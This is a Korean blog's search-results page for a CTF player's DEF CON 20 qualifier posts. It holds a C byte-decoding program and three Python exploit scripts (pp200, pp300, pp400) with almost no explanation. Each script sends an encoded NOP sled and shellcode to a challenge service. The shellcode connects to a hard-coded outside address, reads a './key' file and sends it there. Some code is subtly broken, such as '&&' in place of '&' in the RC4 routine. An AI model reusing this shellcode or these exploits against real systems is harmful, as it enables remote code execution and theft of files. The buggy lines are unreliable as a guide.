Search results for 'defcon 20'

  1. 2012.06.22 -- defcon20 bin200
  2. 2012.06.16 -- defcon20 pp400 exploit
  3. 2012.06.16 -- defcon20 pp300 exploit
  4. 2012.06.16 -- defcon20 pp200 exploit

defcon20 bin200

2012. 6. 22. 02:39
#include <stdio.h>

int main(int argc, char *argv[])
{
	char fname[] = "c:\\mac.h";
	char buf[1024] = {0};
	FILE* fp;
	int ret = 0;

	fp = fopen(fname, "r");
	if (fp < 0)
	{
		printf("fopen error\n");
		return -1;
	}
	ret = fread(buf,1,991, fp);
	
	printf("buf: %s\n\n", buf);

	__asm{
		xor ecx, ecx
		mov edx, 1
		lea eax, dword ptr buf
		xor ebx, ebx
		dec eax
		dec ecx
#if 1 
badcob:
		inc eax
		inc ecx
		mov bl, byte ptr ss:[eax]
		not bl
		mov byte ptr ss:[eax], bl
		cmp ecx, 0x3df
		jnz badcob		
#endif
	}

		

	printf("buf: %s\n", buf);
	fclose(fp);
	return 0;
}

'CTF' 카테고리의 다른 글

Holyshield 2010 Write up  (2) 2012.11.28
JFF2 JH1  (2) 2012.08.11
jff2 silly100  (5) 2012.08.06
defcon20 pp400 exploit  (0) 2012.06.16
defcon20 pp300 exploit  (0) 2012.06.16
defcon20 pp200 exploit  (0) 2012.06.16
pctf 2012 format  (0) 2012.05.09
Defcon 19 b500 writeup  (0) 2011.06.17
ISEC 2010 level8 random array  (0) 2010.11.10

badcob CTF

defcon20 pp400 exploit

2012. 6. 16. 14:14

http://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp400-anvszwpmjdyizhsqgngq.html 참조.



#!/usr/bin/python2.6
#defcon 2012, pp400 exploit - badcob

import socket,sys
import struct
import time

def rc4_initialize(key,x,y):
    tmp = range(255,-1,-1)
    for i in range(0, 256):
        y = (y + tmp[x] +(ord(key[x & 0xf]))) & 0xff
        tmp[x],tmp[y] = tmp[y], tmp[x]
        
    return tmp

def rc4_pop_key(tmp, x, y):
    x = (x+1) & 0xff
    y = (y+tmp[x]) & 0xff
    tmp[x], tmp[y] = tmp[y], tmp[x]
    return tmp[(tmp[x]+tmp[y]) && 0xff], x, y

#shellcode 
sc = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
sc += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
sc += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

#stack address to overwrite
stack_address = 0xbfbfe9fc

#make payload
payload = []
sc += '\x90'
print len(sc)

while sc != '':
    payload.append(struct.unpack('<I', sc[:4])[0])
    sc = sc[4:]

#nop sled + shellcode
#0x42 : inc edx
payload = [0x90909090 for i in range(0,128-len(payload))] + payload
payload += [0x42424242 for i in range(0,248-128)]  
payload += [0xbfbfe9fc]

total_count = len(payload)
current_count = 0

#rc4 initialize
global tmp, x, y
x = 0
y = 0
key = '\xb6\x3d\x15\x3a\x04\x15\x69\x72\x45\xfe\xc2\x7f\x12\x78\xd7\x82'
tmp = rc4_initialize(key,x,y)
print tmp
print len(tmp)

#host, port 
host = '192.168.74.134'
port = 4016

def init(host,port):
    b = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    b.connect((host,port))  
    return b

s = init(host,port)

passwd = 'b366e2776ce9efff'+'\x0a'
s.send(passwd)
print s.recv(256)
sys.stdout.flush()

for i in payload:
    print current_count, hex(i)
    data_list = []
    data = str(struct.unpack('<f', struct.pack('<I', i))[0])
    data = data[::-1]
    for j in data:
        value, x, y = rc4_pop_key(tmp, x, y)
        data_list.append(chr(ord(j) ^ value))
    data_list.reverse()
    data = ''.join(data_list)
    print data.encode('hex')
    try:
        s.send(data.encode('hex')+'\x0a')
    except:
        print 'float error:', i, hex(i), '[+]' + data.encode('hex') + '[+]'
        break
    current_count += 1

'CTF' 카테고리의 다른 글

Holyshield 2010 Write up  (2) 2012.11.28
JFF2 JH1  (2) 2012.08.11
jff2 silly100  (5) 2012.08.06
defcon20 bin200  (0) 2012.06.22
defcon20 pp300 exploit  (0) 2012.06.16
defcon20 pp200 exploit  (0) 2012.06.16
pctf 2012 format  (0) 2012.05.09
Defcon 19 b500 writeup  (0) 2011.06.17
ISEC 2010 level8 random array  (0) 2010.11.10

badcob CTF

defcon20 pp300 exploit

2012. 6. 16. 14:10
#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

def make_payload(scode):
    #padding 1 byte : shellcode length 79byte
    scode += "\x90"

    #move byte ptr ss:[ebp+x], shellcode 1 byte
    mov_byte_ptr = "\xc6\x45"    
    tmp = ''
    count = 0
    for x in scode:
        tmp += mov_byte_ptr + chr(count) + x
        count += 0x1

    #call ebp
    call_ebp = "\xff\xd5\x90\xff"
    return tmp + call_ebp
    
    
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"
port = 7548

num = "3c56bc31268ac65f" + "\x0a"

#make payload
payload = make_payload(scode)

s = make_connection(host,port) 
s.send(num)
s.send(payload)

'CTF' 카테고리의 다른 글

Holyshield 2010 Write up  (2) 2012.11.28
JFF2 JH1  (2) 2012.08.11
jff2 silly100  (5) 2012.08.06
defcon20 bin200  (0) 2012.06.22
defcon20 pp400 exploit  (0) 2012.06.16
defcon20 pp200 exploit  (0) 2012.06.16
pctf 2012 format  (0) 2012.05.09
Defcon 19 b500 writeup  (0) 2011.06.17
ISEC 2010 level8 random array  (0) 2010.11.10

badcob CTF

defcon20 pp200 exploit

2012. 6. 16. 14:08
#!/usr/bin/python2.6
#defcon 2012, pp200 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"
port = 8912

num = "b74b9d86e6cd3480" + "\x0a"
user_id = "a6" + "\x0a"
ret = "\xbc\xe2\xbe\xbf"

#make payload
temp = "\x90"*416+scode+"\x90"*17+"\x0f"
temp += ret + "\x0a"

payload = ''

for x in temp:
    a = ord(x)^0xa6
    if a == 0xa:
        print "failed"
        break
    payload += chr(a)

s = make_connection(host,port) 
s.send(num)
print s.recv(128)
s.send(user_id)
print s.recv(128)
s.send(payload)

'CTF' 카테고리의 다른 글

Holyshield 2010 Write up  (2) 2012.11.28
JFF2 JH1  (2) 2012.08.11
jff2 silly100  (5) 2012.08.06
defcon20 bin200  (0) 2012.06.22
defcon20 pp400 exploit  (0) 2012.06.16
defcon20 pp300 exploit  (0) 2012.06.16
pctf 2012 format  (0) 2012.05.09
Defcon 19 b500 writeup  (0) 2011.06.17
ISEC 2010 level8 random array  (0) 2010.11.10

badcob CTF